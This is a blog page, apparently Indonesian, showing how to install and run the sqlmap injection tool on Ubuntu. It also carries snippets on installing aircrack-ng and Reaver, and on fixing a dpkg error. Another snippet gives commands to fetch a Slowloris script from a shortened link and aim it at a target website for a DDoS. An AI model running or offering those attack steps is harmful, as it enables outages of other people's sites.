Langsung ke konten utama

Install Sqlmap on Ubuntu 12.04 LTS

HOWTO : Sqlmap on Ubuntu Desktop 12.04 LTS

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.

Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.

Step 1 :

sudo -sH
cd /opt

apt-get install git
git clone git://github.com/sqlmapproject/sqlmap.git


Step 2 :

To run it.

sudo -sH
cd /opt
python sqlmap.py



python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'

That's all! See you.

Komentar

Postingan populer dari blog ini

Install Aircrack dan Reaver di Ubuntu 13.04/12.10/12.04 ,Debian and Mint

Anda harus mengikuti langkah-langkah ini: Instal Perpustakaan yang diperlukan: $  sudo apt-get install build-essential $  sudo apt-get install libssl-dev   Download file $  wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz Extract $  tar -zxvf aircrack-ng-1.1.tar.gz $  cd aircrack-ng-1.1 $  vi common.mak Kemudian Anda harus mengedit common.mak berkas dan menghapus werror kata dari baris : " CFLAGS ? = - G - W - Wall- Werror - O3 " sekarang tampak seperti ini: " CFLAGS ? = - G - W - Wall- O3 " Simpan file tersebut dan ikuti langkah-langkah terakhir : $  make $  sudo make install Sekarang aircrack install selesai. Langkah selanjutnya Install Reaver Download   $  wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz Extract $  tar -xzvf reaver-1.4.tar.gz   Instal Perpustakaan yang diperlukan: $  sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-d

Instal DDos Dengan Slowloris di Ubuntu

Kali saya akan membeberkan teknik penyerangan suatu situs dengan slowloris di ubuntu 12.04/13.04/12.10 atau DDOS dengan slowloris. Langsung ke TKP buka terminal CTRL+ALT+T   $  mkdir slowloris && cd slowloris $  wget -O slowloris.pl http://goo.gl/Gmgf3   $  chmod 777 *   $  perl slowloris.pl -dns www.situs yang dituju.com dan tunggu hasilnya ...... kalau digunakan dalam 1 org memang kurang ampuh, tapi kalau dilakukan dalam jumlah banyak sangat ampuh sekali. . sekian dulu

Mengatasi Aplikasi yang tidak terinstal penuh di Linux Ubuntu

Untuk beberapa Problem di dalam penginstallan package di Linux mungkin aplikasi tidak terinstal dengan sempurna menjadi satu dari sebagian banyaknya masalah yang ada di Linux, ini adalah contoh masalah dan bagaimana cara mengatasinya. Contoh kasus:  saat proses ' # apt-get dist-upgrade fungsinya untuk mengupgrade package secara penuh. Error yang di tampilkan: cara penyelesaiannya: ketik di terminal: #  dpkg -r vlc untuk meremove VLC yang tidak terinstal dengan baik. setelah itu coba upgrade kembali: #  apt-get dist-upgrade jika tidak ada lagi pesan error di terminal, maka proses akan sukses, tapi jika ada package lain yang masih error, lakukanlah dengan cara yang tapi dengan nama package yang berbeda. untuk akhir, silakan instal kembali nama package yang tiak terinstal penuh tadi. #  apt-get install vlc SELESAI.